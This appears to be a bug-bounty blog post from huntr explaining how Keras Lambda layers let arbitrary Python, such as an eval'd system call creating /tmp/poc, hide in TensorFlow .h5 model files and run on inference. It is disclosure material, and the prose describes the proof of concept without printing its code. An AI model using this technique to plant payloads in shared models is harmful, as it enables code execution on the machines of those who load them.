Exposing Keras Lambda Exploits in TensorFlow Models

In this blog, we’re breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like TensorFlow—with its Keras Lambda layers—can be exploited. This example is a perfect starting point if you're looking to find and report your own MFVs.
The Vulnerability Explained
TensorFlow allows you to save neural network models with Keras Lambda layers, which enable custom logic via Python code. While these layers add flexibility to your model, they also let you embed any Python code. That means a malicious actor can hide dangerous payloads in what looks like a normal model file. When the model is used for inference, the hidden code is executed immediately on the victim’s machine.
The Technical Breakdown
How It Works
When you save a TensorFlow model that uses a Keras Lambda layer, the code within that layer is serialized into an HDF5 file (commonly with a .h5
extension). During inference, when the model is loaded and executed, this code runs—often without any obvious sign of trouble. An attacker can leverage this behavior to embed arbitrary OS commands that execute as soon as the model is run.
The Proof-of-Concept (PoC)
Our PoC demonstrates how this vulnerability can be exploited. In this example, a malicious Lambda layer is used to execute a system command that creates a file (/tmp/poc
) when the model is loaded and inference is performed.
Step 1: Crafting the Malicious Model
In this snippet, the Lambda layer is defined with a function that uses eval
to execute a system call. When the model is saved, the malicious code is embedded within the .h5
file.
Step 2: Triggering the Payload
When the model is loaded and inference is run, the malicious code in the Lambda layer executes automatically—creating /tmp/poc
on the victim’s machine. In a real-world scenario, an attacker could replace this benign command with something far more damaging, such as launching a reverse shell or modifying system files.
Why This Matters
For bug bounty hunters, this isn’t just an academic example—it's a prime opportunity to cash in on the vulnerabilities lurking in AI/ML tools. Here’s why:
- A Launchpad for Discovery: Use this PoC as a springboard. Dig into other model formats and custom layers; you’re bound to uncover similar, exploitable flaws.
- Lucrative Bounties: With huntr offering up to $3,000 per validated MFV, each discovery not only boosts your reputation but also adds to your earnings.
Conclusion
The Keras Lambda layer vulnerability demonstrates that AI/ML models are more than just data—they can serve as conduits for executing arbitrary code. By understanding how this exploit works, you can better scout for similar vulnerabilities and help secure the ecosystem while earning rewards.
If you’ve discovered a new way to exploit model files or have a fresh twist on this vulnerability, submit your proof-of-concept and detailed report. Happy hunting!
